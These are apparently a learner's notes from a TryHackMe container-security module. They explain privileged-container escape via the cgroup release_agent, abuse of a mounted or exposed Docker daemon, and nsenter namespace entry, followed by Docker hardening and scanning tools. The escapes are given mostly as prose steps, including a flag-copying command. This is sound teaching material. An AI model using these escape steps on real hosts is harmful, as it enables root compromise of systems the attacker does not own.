Container Security

Notes from the 'Container Security' module of TryHackMe

Link to the module

Container Vulnerabilities

Privileged Containers

Docker containers can be run in two modes -

  • User mode - interacts with the Host Operating System through Docker Engine

  • Privileged - interacts directly with the Host OS

If a container is running with privileged access to the OS, commands can effectively be executed as root on the host. You can view capabilities of the container by running capsh --print.

Given below is an exploit on a privileged container using the mount syscall -

The blog explaining the exploit in detail

Steps involved in the exploit -

  1. Create a group to use the Linux kernel to write and execute the exploit.

    The kernel uses cgroups to manage processes on the OS

    Since cgroups can be managed as root on the host, it can be mounted to /tmp/cgrp on the container

  2. For the exploit to execute, we have to tell the kernel to run the code. Adding 1 to /tmp/cgrp/x/notify_on_release tells the kernel to execute something once the "cgroup" finishes

  3. Find out where the container's files are stored on the host and store it as a variable.

  4. Print the location of the exploit on the host system into release_agent so that the exploit will be executed by "cgroup" once it is released.

  5. Turn the exploit into a shell on the host.

  6. Execute a command, cat /home/user1/flag.txt > $host_path/flag.txt, to print the contents of flag.txt into a file on the container.

  7. Make the exploit executable.

  8. Create a process to store that into /tmp/cgrp/x/cgroup.procs so that once the process is released, the contents will be executed.

Commands to execute

Escaping via Exposed Docker Daemon

When interacting with the Docker Engine (by running commands such as docker run) it is done using a socket, unless the command is executed to a remote Docker host. Unix sockets use filesystem permissions, meaning that you will have to be a member of the docker group (or root) to run Docker commands.

The socket will be mounted on the container as adocker.sock file. You can search for the file using the find command. On Ubuntu systems, it will be located in the /var/run directory.

You can use the Docker daemon to create a new container and mount the host's filesystem into the container to indirectly gain access to the host's filesystem. This can be achieved by running the following command -

The command does the following -

  1. Starts a new container with the host's file system mounted to /mnt in the new container

  2. Runs the container interactively using -it

  3. Changes the root directory of the container to /mnt

  4. Tells the container to run sh to gain a shell and execute commands in the container

Remote Code Execution via Exposed Docker Daemon

Docker can also use TCP sockets to achieve IPC. It can be remotely administrated using tools such as Portainer or Jenkins to deploy containers for testing code. Docker Engine will listen on a port (2375 by default) when configured to be run remotely. This makes it easy to remotely access the container but it is difficult to do securely. You can find out if a device has docker remotely accessible by using nmap -

An exposed docker daemon can be interacted with by using curl.

Docker has to be used to send commands to a target. Add -H to switch to the target. You can run various commands like network, images, exec, run.

Abusing Namespaces

Sometimes, containers will share the same namespace as the host OS for communication between the container and host. This can be abused by using the nsenter command. The command allows you to execute or start processes and place them within the same namespace as another process.

You can abuse the fact that the container can see the /sbin/init process on the host to launch new commands such as a bash shell on the host. This can be done using the following command -

The command does the following -

  1. Sets the target of the shell command as the namespace of the special system process (PID 1) to gain root

  2. Sets the namespace to be mounted; If no file is specified, it will enter the mount namespace of the target process.

  3. Allows you to share the same UTS (Unix Timesharing System) namespace as the target process, meaning the same hostname is used; Mismatching hostnames can cause connection issues.

  4. Enters the IPC (Inter-process communication) namespace of the process which is important as it means that memory can be shared

  5. Enters the network namespace to allow you to interact with network-related features of the system; For example, the network interfaces can be used to open a new connection like a stable reverse shell on the host.

bash will execute in the same namespace (and privileges) of the kernel.


Container Hardening

Protecting the Docker Daemon

Make sure to use secure communication and authentication methods to prevent unauthorised access to the Docker daemon.

SSH

You can use SSH authentication to interact with other devices running Docker. Docker uses contexts which can be thought of as profiles. Profiles allow developers to save and swap between configurations for other devices. You must have SSH access to the remote device and the user account on the remote device must have permission to execute Docker commands.

Use the following command to create a Docker context on your device -

Run the following command to switch to the created context -

TLS Encryption

The Docker daemon can also be interacted with using HTTP/S. Docker will only accept remote commands from devices that have been signed against the device you wish to execute Docker commands on remotely when configured in TLS mode.

To configure TLS mode run the following command on the server that you are issuing commands to -

Run the following command on the client that you are issuing commands from -

Implementing Control Groups

Control groups (or cgroups) are a feature of the Linux kernel that facilitates restricting and prioritising the number of system resources a process can utilise. It improves system stability and allows administrators to track the use of system resources better.

For Docker, implementing cgroups helps achieve isolation and stability. This behaviour is not enabled by default and must be enabled when starting a container. Some examples of setting limits to resources for a container -

Use the following command to update the setting once the container is running -

You can view information about a container using the following command -

If resource limit is set to 0, it means that no resource limits has been set.

Read more about cgroups at -

Preventing "Over-Privileged" Containers

Capabilities are a security feature of Linux that determines what processes can and cannot do on a granular level. They allow you to fine-tune what privileges a process has. Some capabilities are -

  • CAP_NET_BIND_SERVICE - allows services to bind to ports, specifically those under 1024, which usually requires root privileges

  • CAP_SYS_ADMIN - provides a variety of admin privileges such as mounting/unmounting file systems, changing network settings and performing system reboots/shutdowns

  • CAP_SYS_RESOURCE - allows a process to modify the maximum limit of resources available

Privileged containers have full root access and therefore it is better to assign capabilities to containers individually instead of running containers with the --privileged flag. The following command removes all other capabilities and adds the NET_BIND_SERVICE capability to the webserver container -

You can determine what capabilites are assigned to a process by using the capsh --print command. Read more about capabilities at -

Seccomp and AppArmor

It is an important security feature of Linux that restricts the actions that a program can do. It allows the user to create and enforce a list of rules of what actions (system calls) that application can make. For example, it can allow the application to make a system call to read a file but not allow it to make a system call to open a network connection. This reduces an attacker's ability to execute malicious commands whilst maintaining the application's functionality.

An example Seccomp profile for a web server that allows for files to be read and written to but does not allow for execution (execve, execveat).-

Apply a profile to a container -

Resources -

Reviewing Docker Images

You should analyse the code for Dockerfiles before using them to check for vulnerabilities or malicious actions. You can use Dive for this. It is a tool to reverse engineer Docker images by inspecting what is executed and changed at each layer during the build process.

Compliance and Benchmarking

Compliance Frameworks

The following frameworks can be used for compliance with regards to containers -

Benchmarking Tools

The following tools can be used to benchmark containers -

  • CIS Docker Benchmark

    • This tool can assess a container's compliance with the CIS Docker Benchmark framework.

  • OpenSCAP

    • This tool can assess a container's compliance with multiple frameworks, including CIS Docker Benchmark, NIST SP-800-190 and more.

  • Docker Scout

    • This tool is a cloud-based service provided by Docker itself that scans Docker images and libraries for vulnerabilities. This tool lists the vulnerabilities present and provides steps to resolve these.

  • Grype

    • It is a modern and fast vulnerability scanner for container images and filesystems.

Using Docker scout to scan an nginx image for known vulnerabilities -

Using Grype to scan docker image for vulnerabilties -

Using Grype to scan exported container filesystem (exported using docker image save) -

Last updated